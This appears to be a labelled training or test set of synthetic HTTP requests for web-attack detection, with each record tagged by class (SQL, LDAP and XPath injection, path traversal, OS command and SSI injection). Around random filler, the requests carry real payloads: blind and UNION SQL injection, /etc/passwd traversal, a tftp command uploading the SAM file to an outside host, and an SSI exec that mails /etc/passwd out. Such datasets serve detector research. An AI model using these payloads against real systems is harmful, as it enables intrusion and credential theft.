GET /8nSrtrEsrEpeTsna01/hNleuCodabnx0iserTem/lGKF2GXoLNPPuJ.IW/idu/dX@1.YQ/o@b5ekp/icktoefRes/vt/tFQWwvMDJ/n8msinSesd.jpeg?@zDP2MJp=%29++++%28++%7C+%28itc%3Dec3*%29&leeeDsdoae=s HTTP/1.0
Host: 118.210.89.235
Connection: close
Accept: application/rtf;q=0.5
Accept-Charset: euc-tw;q=0.4, x-mac-chinesetrad, x-mac-arabic;q=0.5, x-mac-hebrew, iso-8859-4
Accept-Encoding: 
Accept-Language: je-4ild7n;q=0.8, bltg9ee-0Wr6cb;q=0.9, ohh-iind, 7oBast8-n;q=0.4, n4-sete7q;q=0.4
Cache-Control: max-stale=878
Client-ip: 233.33.102.205
Cookie: QJ95P@DmNoaX=ahejtaxoiernph-e;ntkrAATl9aerade=lto
Cookie2: $Version="61"
Date: Sun, 12 Jul 09 19:48:10 GMT
ETag: "J-fv2rP2MOgclBTG"
Expect: rae1
From: eorT@elrAedmeoy.biz
If-Modified-Since: Sun, 24 Feb 08 07:33:57 UTC
If-Unmodified-Since: Sun, 23 Jan 05 09:50:19 GMT
If-Match: "5_8VxQlsFPMJPplOu"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 3.3
Pragma: m5=ez
Proxy-Authorization: Basic ZWxlZmczcjU6Y3NhemQzaXU=
Authorization: Basic aXVSZW86cnNtNw==
Range: 108364-
Referer: http://www.t8kcuep.org/dus0ieri/Unrt83.aspx
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.3 (X11; U; SunOS sun4u 6.5; Gf-im; rv:6.6.7) Gecko/04310003
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 185x781
Via: HTTP/8.8 www.ittyoat.js, seseA/9.2 www.nscy8ssy.png:1321, FTP/4.5 163.31.200.197:4154
Transfer-Encoding: identity
Upgrade: atd/6.6, fyohd/5.4, rwOx/2.2, 2patf/9.0, swe/3.6
Warning: 955 www.0jeun.css "MnohqAoa9er1renYsg6u" "Wed, 21 Sep 05 20:55:25 CET"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38496
Start - Id: 42570
class: SqlInjection
GET /4eXFrFhncJ/dF1u7PAaDNWn51f@Cwe/OdbetweenbJ4/Wogoiupfes/I6_5bTPik7pGN2y/niohseqhwshsng2ao/mLHfR-3kuVV.S.sh?7EnlzX=AND+ascii%28lower%28substring%28%28SELECT+TOP++1+++eea++++FROM+sysobject++++WHERE+++++xtype++%3D+++++%27U%27++++%29%2C1%2C1%29%29%29+++%3E++++111&ptteeiatLg=4382&ianSlt3iHf=t&qwrci=37&5nhtneaQ=toX1fie&ehNo=84401&5lgmqrr=039327&asw=v2ahhwmlaydzsUesl&tu0bKYnzA=%3A%28idudbinelmoi%7Cnyehconnecthall&oRlr0ovi=wX8CbY8&dfdnvadhE5pfe=7314&j6v4TyFem=10968&Efte6ethEao8LTh=78&ej=24236186&iaoep4h=etrnopthttpsr+%3Dfvarmsshp3accepto0 HTTP/1.1
Host: www.bfoEudUnih.cz
Connection: close
Accept: */*
Accept-Charset: cp-936, us-ascii;q=0.6, iso-8859-1, koi8;q=0.1, x-mac-arabic
Accept-Encoding: 
Accept-Language: cteewheh-ulni39e;q=0.4
Cache-Control: max-stale
Client-ip: 197.109.140.61
Cookie: .UlinknXQ=032699;6NEsseyunHr=ntl;dImthd1ytdireae=aio2uz;iZquokte8owr=acecinHo&yeehe;geapn0=lGmoA
Cookie2: $Version="9"
Date: Sat, 11 Aug 07 22:36:21 UTC
ETag: "AIbTkMC-@CHeNXLDldey"
Expect: shrot
From: tmTstilr@oerx.it
If-Modified-Since: Sat, 10 Apr 04 07:19:20 CET
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: "9WySyjfEEFSA.5o"
If-None-Match: *
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 77
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM ZXRlYWFyc1RlaHJzNlRuMGVlc293dGV1c2tlb3Boc2J0c3M5OWVjdGhod3ph
Authorization: feet elTus=lwzomle
Range: 5581-955144,-188690,326959-661
Referer: /eoax/tudnK/nhdytvh/olsz.doc
TE: chunked,trailers,gzip;q=0.6
Trailer: Expect
User-Agent: as1noeiudnr
UA-CPU: MIPS
UA-Disp: 4287,1140,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x8196
Via: FTP/4.3 58.67.60.106
Transfer-Encoding: identity
Upgrade: idlsll/7.2
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 81684
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42570
Start - Id: 46203
class: PathTransversal
GET /rnmeattawiendttes9ao/eJS5HGmvFVJ/uuooiohsisuuRi3motv/tptbgp1a/betweenvN9ATGJw9CCv.jpeg?nexasn=okhQVbiO&uaHjb=00&7ptaNcrakt1ih=rc&PnmLaQY6G=76&m3ibcfCm2tpA=euritcG1odslhfto&s7tdQrTFon=dh+&lcesls4=09903031&sd9rmotelcfhyat=%2Fetc%2Fpasswd&uoikFtmOo=130980&n2sUotoesaex=hdg&6aihdotedDxom=fnSblXX&rscq=2014&hurrnGlg1sh=nbyrnrGclnttst HTTP/1.1
Host: 116.86.133.188
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=295
Client-ip: 116.139.98.213
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="43"
Date: Sat, 02 Jan 10 15:13:48 GMT
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: meamrne@llueIt.be
If-Modified-Since: Sat, 02 Feb 08 01:40:20 UTC
If-Unmodified-Since: Fri, 20 Feb 09 21:16:22 UTC
If-Match: *
If-None-Match: "EeC9TmUiC5mCDt36AMO"
If-Range: "tO0c.-vsS2DGOFfZ"
Max-Forwards: 26
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: Basic bGFlbWU6NXhkeXA=
Range: 684-,-674552,060-
Referer: http://www.rmlo.ch/teo1ezT/iaeya7e.cfm
TE: gzip,trailers
Trailer: Accept
User-Agent: Mozilla/1.3 (Machintosh; U; PPC 7.8; sg-ch; rv:6.2.1) Gecko/79652105
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 231.32.166.77, 1.9 17.12.20.169
Transfer-Encoding: deflate
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 03479803459
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46203
Start - Id: 44897
class: PathTransversal
GET /Z2WNKMeDyAAW1Fb/group byMhW7jem/rLpZGKq7Nj/agzO-8oLgFOrysh-/3openH0V5g6H3R@Gn/egNsGGnQeUT.HLd/0SZ.Tj0ls1wyoO7q/L3eUp/olco7DOeprstjotays.tiff?M.KbVuN92qdrop=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml HTTP/1.1
Host: www.tliear0l.biz
Connection: keep-alive
Accept: application/postscript;q=0.6, video/*, image/png;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ota-Rt;q=0.0
Cache-Control: no-store
Client-ip: 139.102.255.156
Cookie: tipfldua7sit==re[>isOuTy>epuF;ltTirtphrpwhb=msuqTohftu
Cookie2: $Version="65"
Date: Sat, 24 Jun 06 04:28:58 CET
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: eaqhh8
From: setPoitm@ioa6tb8.uk
If-Modified-Since: Tue, 13 May 08 08:39:40 CET
If-Unmodified-Since: Sat, 16 Oct 04 03:34:08 CET
If-Match: *
If-None-Match: "0GeRis-uJ8oYhw-Km"
If-Range: *
Max-Forwards: 7
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Digest realm
Range: -129
Referer: http://www.wrrb.be/naulgahC/7sos.pl
TE: deflate,deflate,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: xac.-VBV@C http://www.aIaqthih.de
UA-CPU: StrongARM
UA-Disp: 7572,678,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6797x3315
Via: HTTP/5.2 5.190.245.126, 9.6 247.140.109.190
Transfer-Encoding: identity
Upgrade: yr2s/6.7
Warning: 505 www.whdaeah.png:65519 "1gln" 
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44897
Start - Id: 37083
class: LdapInjection
GET /wE3xFOopn_r/k37Sul9SL0t.shtml?nmrTetuloei=8wmi%29%28%26%28objectClass+%3D++++texx*%29&Vz@E1B=9Gv7&G0opt1twNH=NyhtelnetautaeicmH2&g1eHtoyZwir3lh=NEdsedrerwrna1eneu HTTP/1.1
Host: www.zqnacelts4.net
Connection: uqUArp
Accept: */*;q=0.8
Accept-Charset: x-mac-greek, iso-2022-jp;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 154.56.180.14
Cookie: JmOe=sehhdoiitabaW;nhi=9Iij0;odvbscriptt=i\s7;__httpsmyS=ayoa(sn<erTri;e9Xi-v5W=06318;oooa6d1ed61Hd=icuesdm
Cookie2: $Version="6"
Date: Sun, 21 Oct 07 05:04:20 UTC
ETag: "zuQy6UP2oJx68ZPfZ"
Expect: 100-continue
From: Wtzcle@sDsakEtber.gov
If-Modified-Since: Thu, 20 Aug 09 20:35:59 UTC
If-Unmodified-Since: Wed, 14 May 08 09:03:00 UTC
If-Match: *
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Sun, 20 Jul 08 06:55:29 CET
Max-Forwards: 20
MIME-Version: 4.7
Pragma: aluq='yw'
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: NTLM dW9hYXNsckVhcWVyMGREM2RiQ0FocG5uZXNvYW5xbnRvMWlnZXViY20=
Range: -5
Referer: /ydjenket/noe98/2uzAesa/nnHhgE/2lya.nsf
TE: deflate,trailers
Trailer: From
User-Agent: oI3s2i7/1.8.8.7.4
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7857x018
Via: 4.0 www.Aasuneu.gif:17, 5.5 78.123.220.64, HTTP/5.9 www.tacbdhd.htm
Transfer-Encoding: ek5s; cBlAt=cdCael
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 905 www.ilsemrE.gif "n9hMwntaulc" "Sat, 03 Nov 07 02:21:06 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 252851
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37083
Start - Id: 44616
class: OsCommanding
GET /arnC38nArJoaiulon/5Y05wXv8znBzg1Zc-Ax/leertjstiaoa/tWuckjj.png?xerenf8=edae4nrnrI9fon&CChCechoX=tHnnuirizeOehex&aazfeha6tmArvn=1hN&aleEOidDry=01VKb3T9.CWv&u4yumlSEicn=7755&erTnell=eesn%2Bpaho&egfmgwj=0825041066&Sk0ea=129.62.37.118++%7C+tftp+-i++139.222.57.197+++PUT+sam._ HTTP/1.0
Host: www.caSwdtasl.uk:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-japanese, cp-936, gb2312, iso-8859-1;q=0.8, x-mac-hebrew;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 187.185.41.118
Cookie: 8samUDnxjX6Q=sioNoE/fadeg;eOrmVIX=2760;reils=Aae;GySghgeii=sbZIl;rsrs2t2eHh=a-Ljn@BFwfj2;qb=9
Cookie2: $Version="4"
Date: Mon, 18 Aug 08 01:16:59 CET
ETag: "_6Y7jSzR68UTRzizu44"
Expect: 100-continue
From: yrtaag@x3hp5xn5i.net
If-Modified-Since: Sun, 03 Jan 10 10:51:33 UTC
If-Unmodified-Since: Thu, 09 Oct 08 01:26:08 UTC
If-Match: ".cVag-ExCXcwA1WT"
If-None-Match: *
If-Range: Fri, 06 May 05 12:01:31 UTC
Max-Forwards: 7611
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Basic ZWh0ZTpmM2FldQ==
Range: 6245-9,4665-34,-76
Referer: /0qrle6/TLr9wnnt/eotest5i/Eteetgea/sieokktg.jpeg
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/4.5 (X11; U; Unix 4.2; nu-ti; rv:0.5.3) Gecko/62695106
UA-Disp: 0488,6492,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/5.3 188.64.121.58
Transfer-Encoding: compress
Upgrade: eAde/6.1, ueb0oz/9.4, i3ldy/7.4, oibua/9.2, mca3ir/3.2
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 117.132.107.47
X-Serial-Number: 92326230406152
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44616
Start - Id: 40101
class: SSI
GET /T_nI6/tayehioocdoitql/b7ea8/eh/toTHaVzlFC8QgGqRF5eI/IWlrD6.19execu/2das/tl5e3hTtno/ezuboiTebfsgwhiBncE/o1ESoio/OunionlNcg_v5opendfYtK/H-4zBPtgconnectmHtD9d.js?ftpYgfA=%3E%3Ey&hAatNhv2nt=%3C%21--++++%23exec++cmd%3D%22%2Fbin%2Fmail+wf6e.com++%3C+%2Fetc%2Fpasswd%22--%3E&wae63Lx=rtdicyq HTTP/1.1
Host: www.leueNg3rn.be
Connection: close
Accept: */*;q=0.1
Accept-Charset: utf-7, windows-1258;q=0.4
Accept-Encoding: 
Accept-Language: Ar4m-boolita, k-ai
Cache-Control: no-cache
Client-ip: 113.207.135.168
Cookie: Omir=22698
Cookie2: $Version="5"
Date: Thu, 09 Nov 06 19:06:45 GMT
ETag: "TiA@-@BOj-dF88jDdY-F"
Expect: smk9rHu
From: wapns@pecdn.de
If-Modified-Since: Tue, 08 Jun 04 18:07:37 UTC
If-Unmodified-Since: Fri, 23 May 08 22:59:36 GMT
If-Match: "jV3Pi_I1WMaCmpTp@FT"
If-None-Match: *
If-Range: "YSlp-R3rBSXZ2bPVpIM"
Max-Forwards: 6
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://hOaez.ch/vyle/adcoet/ecied4i/lmeje/fyuT.htm
Authorization: Basic czBMcnNhOmhwdEI=
Range: 0-640
Referer: /cgedM1/tted2/qenusf.wav
TE: deflate
Trailer: Proxy-Authorization
User-Agent: ttLu.DRsba http://www.rpai.net
UA-CPU: 68000
UA-Disp: 952,4343,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 192x9251
Via: 0.9 www.f6hxcoq.htm, FTP/3.4 www.darlA.html, raew/7.3 237.46.108.182
Transfer-Encoding: compress
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 579 74.104.76.46 "raice5uopltesn" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40101
Start - Id: 45175
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: www.haaciert.gov:80
Connection: sC9useia
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: iuo-FTem;q=0.7, cnjsuoa-o, nhszhcE-s;q=0.4, aoroeo-imsrbg5, m-jc0pot;q=0.6
Cache-Control: no-cache
Client-ip: 35.207.4.140
Cookie: eOssErdweHee2tl=CeINrafoeoe8tos;gsoe8= ]en/oirhveagroup byaddimgcsS
Cookie2: $Version="339"
Date: Sat, 08 Apr 06 11:52:34 UTC
ETag: W/"nusweEuleB7R8Ih"
Expect: fgif=iewrtvs;yt4mf3=astf
From: eeatnnio@srlvirtei.ch
If-Modified-Since: Tue, 20 Apr 04 11:47:43 UTC
If-Unmodified-Since: Tue, 02 Oct 07 19:20:38 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Jul 06 13:47:52 CET
Max-Forwards: 748
MIME-Version: 0.7
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest nonce
Authorization: NTLM RmlsbGN0Zjd0YWNIb2loYWMwRTdqbnpuRTRyYXJpVWFydXRUaXRPcmplYm41
Range: 551-3881,-846
Referer: http://arNvsv.uk/eouelW1/rs5eSe/l5srnfen/erdd8w/8iReh.nsf
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: 5hb740imoUtekvs
UA-CPU: StrongARM
UA-Disp: 133,5622,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1177x8327
Via: HTTP/8.6 239.130.14.164:4, 0.2 60.246.247.19:3660, 2.6 42.206.35.200
Transfer-Encoding: identity
Upgrade: m9C/4.5, ieeqod/9.0, taiim/1.8
Warning: 731 www.s1twimt.js "shcldhaeymHeqh" "Wed, 16 Mar 05 01:22:20 GMT"
X-Forwarded-For: 249.70.128.210
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45175
Start - Id: 49990
class: XPathInjection
POST /dQ1i/cGnRbyHx/noT.tiff? HTTP/1.0
Content-Length: 171
Content-Language: 8kkl5Ose,n,euonahba
Content-Encoding: deflate
Content-Location: /5kos.js
Content-MD5: ZWtuaEFydGFhRW56bmRjYw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Mar 07 04:38:52 UTC
Last-Modified: Thu, 31 Dec 09 12:12:52 GMT
Host: www.9HWIb4tp.cz
Connection: hzpobr
Accept: application/zip
Accept-Charset: cp-932, x-mac-japanese, windows-1258
Accept-Encoding: 73322     or rbiepa/ger/daatw/child::node()[position()=489]   or     111=
Accept-Language: *
Cookie: fh=3599108
Date: Fri, 15 Jul 05 23:17:14 CET
ETag: "B@Z_FoQ6sHQt.m-"
Expect: aef0
From: Hrtiy@r0sqSkft.de
If-Modified-Since: Fri, 13 Oct 06 14:31:55 GMT
If-Unmodified-Since: Sun, 11 Dec 05 19:38:23 GMT
If-Match: *
If-None-Match: *
If-Range: "MjwzQk3yJNHB_H.YhnEq"
Max-Forwards: 658
Pragma: anhe8=t9eenaos
Referer: http://www.e5reut0a.ch/Ai0zl/fhisy/eul2st.conf
TE: deflate;q=0.2,deflate;q=0.1
User-Agent: h@_c5m4 http://www.on9oieeY.be
UA-CPU: x86
UA-Pixels: 431x444
Via: FTP/3.2 www.gy3nsTtT.jpg:67, ikdhxz/5.6 www.detnInl.tiff
Transfer-Encoding: s5h5a; sThu=sqawcods
~~~~~: ~~~~~~~~~~~~

vthHhojo4jhl=93&hqirdt=shutdown&tdrus=uu7tiu&XtzaT=aFyU&nn0hcbio=iwe&awte=naae4fosor&dhooymn=n3&5oWwo=eRAOwN.ZDhm&XmgidE=shh&qdnEnheaihahss=lbo&Vphooqy=21939345&ountfl=453

End - Id: 49990
Start - Id: 35906
class: XPathInjection
POST /0TY/4ZRW_8I8G6DhcSoMBqU1.png? HTTP/1.0
Content-Length: 106
Content-Language: 9teci59e,Qe,gsil
Content-Encoding: deflate
Content-Location: http://ntetu.net/edemneq/edle/jyeL.doc
Content-MD5: YXMwb0loNGVjcm5ld2g4cA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Mar 09 10:35:43 UTC
Host: 173.35.158.105
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1251;q=0.2, cp-932, utf-8;q=0.5
Accept-Encoding: 
Accept-Language: uenteeh-qe;q=0.4
Cache-Control: max-stale=9
Client-ip: 137.208.9.219
Cookie: 5FBacceptWGSs@r=15     or   count(path/child::node()[position()=((i+j+k+l+1)] | path/child::*()[position()=(k+1)])=1  or 71921=;hdai4e66osh=823;tieod2slpnhY8o=iShdShdmEjenT
Date: Sat, 17 Dec 05 02:08:39 GMT
ETag: W/"3xNXhliIV8haJdc__P"
Expect: 100-continue
If-Modified-Since: Sun, 29 Nov 09 23:34:06 UTC
If-Match: "P-4tg9G9n2DnCc43Tmht"
If-None-Match: "gqkt@isa6nKHl6e"
If-Range: Sun, 18 Dec 05 06:10:20 CET
Max-Forwards: 6989
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic Z2R0ZzpmMXRydGg=
Authorization: Basic ZGlyOGU6YWYyaXM=
Range: 87966-060057,21-8
Referer: /nisricso.asp
TE: trailers,chunked,chunked
Trailer: User-Agent
User-Agent: Mozilla/4.1 (X11; U; Open BSD i386 6.5; do-ue; rv:0.7.9) Gecko/73798576
UA-Disp: 7456,654,8
Via: FTP/0.7 www.tiCsg.css
Transfer-Encoding: deflate
Warning: 665 227.183.127.64 "uereigdeiccad5sfxruj" "Fri, 31 Dec 04 19:45:33 UTC"
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

8eofu3amdrrL=nLK8dEWMvsb&GehpesnttarEee=Ltiu0ireaepAe6fant&sy8ftvfsr=9668&torasiko7eor=edssrevIriRgnYnMA6s

End - Id: 35906
Start - Id: 41846
class: SqlInjection
GET /nycadtcg/HgePbodyu/omxarZMM6/MBkEtQOdphpoMaTsystemz/1ssmrEhcn9fey/reEwRntzifna/nE5ahq-jh2jS/dhtaccesRkDhtacces8-MVoCMz.htm?crraot=dsn&4vbdlo5=imazlio%3D0d%5Cfj%26ote4b&CZHCmC=j72QOip&gc=oehcp&tCaocr=9831767&rcgtah=v&rtiR=AND++ascii%28lower%28substring%28%28SELECT+TOP++1++qgjyd++++FROM+++++sysobject+++WHERE+++++xtype+%3D+++%27U%27+%29%2C1%2C1%29%29%29+%3E++111&ihvst2botCae=sd7drrcdttYde&qstdinkrM=I%5Dtjikn&1SSITe=ceH1cr&epin6qi=66&MIbnT=8461&ahjp0q6=gsbQmi&90ueEgfeah5talm=suaTr HTTP/1.0
Host: 228.115.252.60
Connection: caeama
Accept: image/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: r-iss, caa-1em, he3craad-roof, v-ol9;q=0.7, ininorhi-eAaEtss
Cache-Control: max-age=9
Client-ip: 78.57.136.131
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="1"
Date: Mon, 11 Feb 08 03:53:01 GMT
ETag: W/"cz.00rc4Qme_.Upsmc"
Expect: eeofsc=natlqi
From: dupNd@t1Lces4e.com
If-Modified-Since: Sun, 17 Sep 06 13:50:27 GMT
If-Unmodified-Since: Thu, 03 May 07 24:46:57 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 1.6
Pragma: auh=nycmry
Proxy-Authorization: Basic dG90ZGgzMTpUb2hj
Authorization: heea seltmfr=o7On
Range: 73381-69805,4-176585
Referer: /uaeskr/s46r.doc
TE: trailers,gzip,gzip
Trailer: Max-Forwards
User-Agent: rpdoM/3.7.0.5
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/7.0 www.sdiMcdb.jpg:7, 3.0 246.96.49.78
Transfer-Encoding: identity
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 541 75.79.93.246 "gtmeetecTcrcgl" "Sun, 13 Nov 05 09:19:41 UTC"
X-Forwarded-For: 187.70.226.8
X-Serial-Number: 431124702375
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41846
Start - Id: 37460
class: LdapInjection
GET /wrtlsf8e0s/dxiarahetx/6cIPs08PmmhlocationWDs/pj.BgIzS4pHb/sysnehx1ls5ia1dscsi/k_@-mozWFZvBbgsound8/sClzt7clWQix5nY/ehexl0Tdevt9knh/urjESI74/chO.HVkw.php4?arigtene=ltxjha&de2Sftaraas4la=tNsEC6 HTTP/1.1
Host: 189.111.93.112
Connection: keep-alive
Accept: application/zip;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 212.186.34.75
Cookie: dune8etmtbatr=649)(&(objectClass=dtUe)(|(sn   =    opo)(cn=Fm5   J*))
Cookie2: $Version="1"
Date: Wed, 20 May 09 13:43:48 CET
ETag: W/"jr9AFu4ziuRu@mwVDbR"
Expect: Ieoy=oO0Rt
From: rOjoxac4@o2cz.biz
If-Modified-Since: Wed, 07 Jul 04 16:25:57 CET
If-Unmodified-Since: Sat, 05 Nov 05 04:14:31 CET
If-Match: "_KnqstF.MYBxABuq"
If-None-Match: "89C5eET1y@2RhvI8"
If-Range: "6NXFnF4u5dA9od8"
Max-Forwards: 6
MIME-Version: 1.8
Pragma: jwev=hoimlt
Proxy-Authorization: Digest uri=/uso6on.bin
Authorization: ies9 i0lfwr1a=eaeleriH
Range: 0504-,-286
Referer: /Iotls/toeemgm8.asmx
TE: trailers,chunked
Trailer: Referer
User-Agent: a0OMQZOI http://www.cbma.de
UA-CPU: PowerPC
UA-Disp: 025,555,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 161x1713
Via: FTP/7.3 www.znsi5w.gif:664, HTTP/5.4 176.109.247.236, meeehe/4.0 www.Reiess.tiff
Transfer-Encoding: gzip
Upgrade: oii/8.9
Warning: 814 www.azme.gif "Aehomnrgnhad8toeb" 
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37460
Start - Id: 41351
class: SqlInjection
GET /y9UAmy/q0J/6MhgT/ty8e4sZaTTt/zbGAU5/nbENrkqjUT8x@gVOOb/h41@uZoM9o.pl?hcufur=TtTKweiprws HTTP/1.1
Host: www.pnA35a.st
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=85
Client-ip: 18.247.21.155
Cookie: 6dYI66G=' union     select    @@version,1,1,1--;wtf9d46=eTinode4tn;lmxae=ehdzuiserH
Cookie2: $Version="0"
Date: Thu, 13 Apr 06 14:23:48 UTC
ETag: "ZOtV3JU4szW5N_3."
Expect: atne=szuher
If-Unmodified-Since: Wed, 11 Apr 07 17:53:09 UTC
If-None-Match: *
If-Range: Wed, 22 Feb 06 04:18:04 CET
Max-Forwards: 279
Pragma: no-cache
Authorization: Digest qop=dwej
Referer: /tarh0/apomr0H.shtml
TE: trailers
User-Agent: 7socu/9.1
Transfer-Encoding: deflate
Warning: 898 101.29.205.145:592 "adae" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41351
Start - Id: 35214
class: SqlInjection
GET /oDan/netcatJsGid/dorp3drK96/l99NV.aspx?redyveWwcStnk=oe56%29kea&nrdttinttdisn=nA4U&oeit0h8tpNe=8344&hnti66tog=6259340&ss9El4ne=79954&ies7rneum=4934&Ct3sh=qwer%27++or++oiby_v.Account%3D%27Ch2i%40ruatf3.com&jeE=69754&anNbilh=Rhf1tn&OEPideleteW=43&590sm6ohrhrt=09036&mrElk=cesg+n4systemflktos&ct=61617&dl09pXitio4kjc=3694191133&airenenetmnsv=aem7sstelnethna5N HTTP/1.0
Host: 103.112.158.137:18
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: deflate
Accept-Language: 1aloscee-tan9reyf;q=0.4, iae-rSiniuep, nsmirt-lE9;q=0.5, TtotoaY-34iat6r;q=0.1, dvbs6o3i-a2kftq
Cache-Control: min-fresh=434
Client-ip: 247.223.116.97
Cookie: havingF0MnodeotHSsxJ=792;2srwevg5oh1i=42627
Cookie2: $Version="29"
Date: Fri, 06 Jan 06 10:15:33 GMT
ETag: "osdX6lLH@4A8bU-Sr0"
Expect: duapjRis=awoeo;l1m7=3t6n
From: inoen@aqahlweho.fr
If-Modified-Since: Wed, 04 Nov 09 01:51:40 GMT
If-Unmodified-Since: Sun, 23 May 04 08:17:57 UTC
If-Match: "1grv9A-vF8zZuAutg9w7"
If-None-Match: *
If-Range: Sat, 26 Mar 05 06:52:38 GMT
Max-Forwards: 31
MIME-Version: 1.4
Pragma: thhet2=qe
Proxy-Authorization: Basic dGRvc2xXOmFlY2FyN3Nu
Authorization: oaihl AEnmn=htiils
Range: -30216,36258-
Referer: http://fiane.be/ttia/5dm0kaCi/oxc52Aer.jsp
TE: trailers
Trailer: Accept-Language
User-Agent: sXPj.-WU http://www.edmy76t.cz
UA-CPU: StrongARM
UA-Disp: 3369,6494,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 2.5 160.198.150.9, s6sIhc/0.6 214.98.136.146
Transfer-Encoding: eomton
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
